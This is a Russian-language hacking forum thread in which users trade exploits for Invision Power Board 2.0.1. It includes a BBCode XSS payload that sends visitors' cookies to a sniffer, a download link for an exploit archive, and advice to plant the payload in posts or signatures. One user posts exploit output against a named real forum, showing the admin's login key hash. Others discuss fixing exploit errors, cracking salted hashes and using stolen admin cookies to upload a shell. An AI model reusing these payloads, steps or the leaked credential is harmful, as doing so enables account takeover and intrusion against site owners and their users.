![]() |
IPB v2.0.1 - Что это такое? И с чем его едят?
Что это такое? И с чем его едят? Можите по этому движку что нить дать?
|
1.сплойт от http://rst.void.ru
2.xss wj. |
Цитата:
и что нужно говорят исправить в сплоите? |
что тебе ещё давать???????? и так всё понятно!
1.зайди на вышк указанный сайт => Exploits => там ищи сплойты для IPB 2.0.1 2.воспользуйся поиском по форуму! тут уже не раз давали прямую ссылку на тему, но попробуй сам поискать... |
Цитата:
|
Я бы дал такую ссылку. Там всё есть. А от собственного нежелания искать (между прочим, за 10 минут можно управиться) нечего напрягать других.
|
Код XSS
Код HTML:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="Адрес_Сниффера?"+document.cookie) [/COLOR]www.barsik.jino-net.ru/ipb.rar Сплоит удалю сегодня вечером так что качай :) |
Цитата:
|
Ipb ни с чем не едят блин..
да и вообще иди выучи что такое хсс и потом спрашивай..... |
Код Xss, который тебе дали нужно отредактировать под свой или ачатовский, или любой другой сниффер, а потом запостить всё это на форуме или втыкнуть в подпись и ждать пока придут куки.....
Спрашивай, что не понятно, если сам знаю, то объясню-)))) И не забывай про репутацию...;-) |
C:\>c:\perl\sploit\ipb.pl www.himclan.com /forum/ 1 1
[~] SERVER : www.himclan.com [~] PATH : /forum/ [~] MEMBER ID : 1 [~] TARGET : 1 - IPB 2.* [~] SEARCHING PASSWORD ... [|]Can't use an undefined value as a symbol reference at c:\perl\sploit\ipb.pl line 134. сплоит вот что пишет что значит? |
Это значит, что в сплойте есть ошибка в строке 134.
|
Цитата:
У меня такое бывает довольно часто. А раза с пятого хэшик получаю. Хотя может ошибка и другая была :) |
Цитата:
site.ru /forum/ 1 0 |
Кстати у меня тоже 2 раза выскакивала ошибка в строке 134. Баг видимо в сплойте.
|
Цитата:
|
Это значит что сплоит получает в ответ символ, который не может корректно обработать, зависит не от сплоита, а от ответа сервера который бомбишь.
|
Да все работает...
Вот вам Хэш Админа C:\Tools\Программы>perl ipb.pl www.himclan.com /forum/ 1 1 [~] SERVER : www.himclan.com [~] PATH : /forum/ [~] MEMBER ID : 1 [~] TARGET : 1 - IPB 2.* [~] SEARCHING PASSWORD ... [ DONE ] MEMBER ID : 1 MEMBER_LOGIN_KEY : b65e23ca7ec5961b2c6710237c988e48 Не забудьте про репутацию :)) PS На форуме присутствует также XSS Баг :)) |
Эге...
Могу еще один сплоит посоветовать, если найдешь... ipb_skides.pl Классная тема... Нужная, найдешь береги, не давай никому... :) |
На Ачате есть этот сплоит. Вроде он :)
http://forum.antichat.ru/threadnav8206-3-10.html |
Не совсем тот, там есть отличия.
Не буду их тут приводить там защита "от дурака" =) И тот, что ты указал, немного переделанный... Ну там хоть защиту не сняли... А кто снимал так заведомо не правильно =) |
А что нить еще можите надыбть с этого форума? )) И ссылочку на прогу что хэш ломает не подскажите?
|
Чет немогу этот хэш ломануть ((
|
Версия форума 2.*.*!
Ты с солью расшифровываешь? |
Если даже и без соли то пасс не так скоро появится... Возможно только через неделю расшифровки получишь его :(
|
Господа!
Есть вопрос по поводу сплоита который выдает вместо хеша нули... Я сам в перле вообще не силен, а сплоит мне давали по-знакомству, уже рабочий... Вчера, ставил себе Вынды и потер его случаем... Помогите кто может.... ----- ЗЫ. Не обижайтесь плз за вопрос... |
Цитата:
Код HTML:
$allchar .= chr($char); |
Неа не то...
Эту ашипку я и сам нашел и понял... Другой сплоит, то о чем мы с тобой спорили... Цитата:
|
Цитата:
Хотя я тебе советую пользоваться сплойтом от rst! ИМХО Его править намного легче=)) А так разницы ни какой. |
Цитата:
Пользоваться rstipb2.pl там бессмысленно выдает [Failed]. Ну с Log In я понял. Спасиб ==> + |
Если выдаёт [Failed], то значит, что форум скорее всего пропатчен.... Ты ещё попробуй=) Просто если от rst сплойт выдаёт фэйлд, то и тот тоже не будет хэш выдавать...
да не за что-) Если хочешь, то я тебе могу на мыло скинуть рабочий сплойт r57ipb2=) Или тут выложить, как хочешь, если надо. |
ShturmBanFurrer
Дай ссылку на форум |
Да если 2* то мне кажется тебе бес толку ломать сайт если 1.* то ещё есть возможность. Но а так же можно просто куки у админа украсть потом подставить потом зайти в админку залить шелл и дело сделано.
|
Цитата:
Или если я не прав раскажи как. |
Цитата:
|
Цитата:
Если кого интересует, то стучите в АСЮ 33-83-53-5 Там поговорим. Расскажу реакцию сайта на хсс. Не стоит тут флудить. Может я чем отблагодарю, если мои возможности совпадут с вашими желаниями. |
Цитата:
|
| Время: 11:27 |